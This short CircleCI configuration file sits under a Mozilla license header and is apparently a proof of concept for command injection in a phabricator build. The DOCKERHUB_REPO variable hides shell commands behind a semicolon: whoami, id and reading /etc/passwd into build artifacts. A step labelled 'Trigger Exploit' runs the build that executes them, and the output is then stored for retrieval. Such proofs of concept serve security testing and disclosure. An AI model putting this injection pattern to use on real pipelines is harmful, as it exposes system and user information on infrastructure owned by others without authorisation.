# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.

version: 2.1

jobs:
  full:
    docker:
      - image: cimg/base:stable
    environment:
      DOCKERHUB_REPO: 'mozilla/phabricator; whoami > /tmp/artifacts/info.txt; id >> /tmp/artifacts/info.txt; cat /etc/passwd > /tmp/artifacts/passwd.txt'
    steps:
      - setup_remote_docker
      - checkout
      - run:
          name: Pre-setup artifacts
          command: mkdir -p /tmp/artifacts
      - run:
          name: Install dependencies
          command: |
            sudo apt-get update && sudo apt-get install -y python3-pip
            pip install invoke
      - run:
          name: Trigger Exploit
          command: invoke build
      - store_artifacts:
          path: /tmp/artifacts

workflows:
  main:
    jobs:
      - full
